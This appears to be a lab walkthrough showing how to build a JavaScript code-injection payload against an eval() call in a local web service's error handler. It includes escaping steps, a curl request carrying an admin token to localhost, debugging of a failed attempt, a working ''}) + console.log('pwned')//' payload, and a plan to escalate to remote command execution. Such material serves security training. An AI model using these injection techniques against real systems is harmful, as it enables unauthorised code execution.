Code Injection

Overview

Instead of random injection attempts, build payload gradually based on knowledge to track how it looks when reaching the target function.

---

The onError String

`throw({message: 'The input "${text}" contains the following invalid characters: [${text.match(
  /['"`;]/g
)}]', statusCode: 403})`

With text = ";"

throw {
  message: 'The input ";" contains the following invalid characters: [;]',
  statusCode: 403,
};

Injection Points

Point	Location	Usability
1	"${text}"	✅ Entire input placed
2	[${text.match(...)}]	❌ Only match output

Best target: First injection point "${text}"

---

Building the Payload

Step 1: Escape the String

String starts with 'The..., so use single quote to escape:

throw({message: 'The input "'" contains...
//                            ^ breaks here

❌ Broken syntax - will crash

Step 2: Comment Out Rest

Add // to comment out remaining code:

throw({message: 'The input "'// " contains...

❌ Still broken - uneven parentheses

Step 3: Close Parentheses/Braces

Close the opening ({:

throw { message: 'The input "' }; //" contains...

✅ Valid JavaScript!

Payload so far: '})//'

---

Three Rules for Injection

Rule	Description
1. Comment out	Use // to ignore rest of code
2. Even quotes/parens	Close all opened {, (, ', "
3. No syntax errors	Ensure code runs without crashing

Handling Syntax Errors

If function expects variables:

', statusCode: 403})//

If multi-line string:

',//  // Use comma instead of closing

JSON Escaping

Remember to escape double quotes in JSON body:

{ "text": "'}); console.log(\"pwned\")//" }

---

Code Injection Attempt

Payload

{ "text": "'}); console.log('pwned')//" }

Expected Result

throw { message: 'The input "' };
console.log("pwned"); //

Send Request

curl -s -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <ADMIN_TOKEN>" \
  -d "{ \"text\": \"'}); console.log('pwned')//\" }" \
  http://localhost:5000/api/service/generate

Response:

{"message":"Could not generate QR code."}

Check Console

Debug Console (CMD/CTRL+SHIFT+Y)... Nothing logged! ❌

---

Debugging the Failure

Set Breakpoint

Line 9 on eval(onError) → Inspect onError value

Copy Value

"throw({message: 'The input \"'}); console.log('pwned')//\" contains the following invalid characters: [',',']', statusCode: 403})"

As Executed Code

throw { message: 'The input "' };
console.log("pwned"); //" contains...

Code looks correct... so why didn't it work?

The Problem: throw Statement

In VSCode, the injected code appears transparent = code never reached!

Reason: throw statement stops execution immediately!

throw { message: '...' };  // Execution stops here
console.log("pwned");      // Never reached!

---

The Fix: Same Line Execution

Problem

; creates new line → code after throw never runs

Solution

Use + instead of ; to chain expressions on same line

throw { message: '...' } + console.log("pwned")

New Payload

{ "text": "'}) + console.log('pwned')//" }

Result

⚡️[server]: Server is running at http://localhost:5000
⚡️[api]: APIs are running at http://localhost:5000/api
pwned   ← ✅ CODE INJECTION CONFIRMED!

---

Working Payload Analysis

Payload

'}) + console.log('pwned')//

Part	Purpose
'	Close the string
}	Close the object
)	Close throw()
+	Chain expression (same line)
console.log('pwned')	Injected code
//	Comment out rest

As Executed

throw({message: 'The input "'}) + console.log('pwned')

---

Updated Checklist

#	Step	Status
1	Hit the validateString function	✅
2	Trace how input looks within function	✅
3	Obtain an admin role	✅
4	Confirm we reach the eval function	✅
5	Prepare the payload	✅
6	Confirm payload reaches target as intended	✅
7	Inject code and confirm injection	✅
8	Reach command execution or file writing	⏳
9	Blindly verify command execution/file writing	⏳
10	Automate exploitation (write exploit)	⏳

---

Key Lessons Learned

1. Build Payload Gradually

Don't guess - construct based on knowledge of the code.

2. Understand JavaScript Execution

• throw stops execution

• ; creates new line

• + chains on same line

3. Debug When Stuck

• Set breakpoints

• Inspect variable values

• Check if code is reachable

4. VSCode Hints

Transparent/dimmed code = unreachable code

5. JSON Escaping

Always escape " in JSON payloads: \"

---

Summary

Issue	Solution
Breaking syntax	Close all quotes/parens
Dangling code	Comment with //
Code after throw	Use + instead of ;
JSON breaking	Escape double quotes

Next: Turn code injection → command execution (RCE)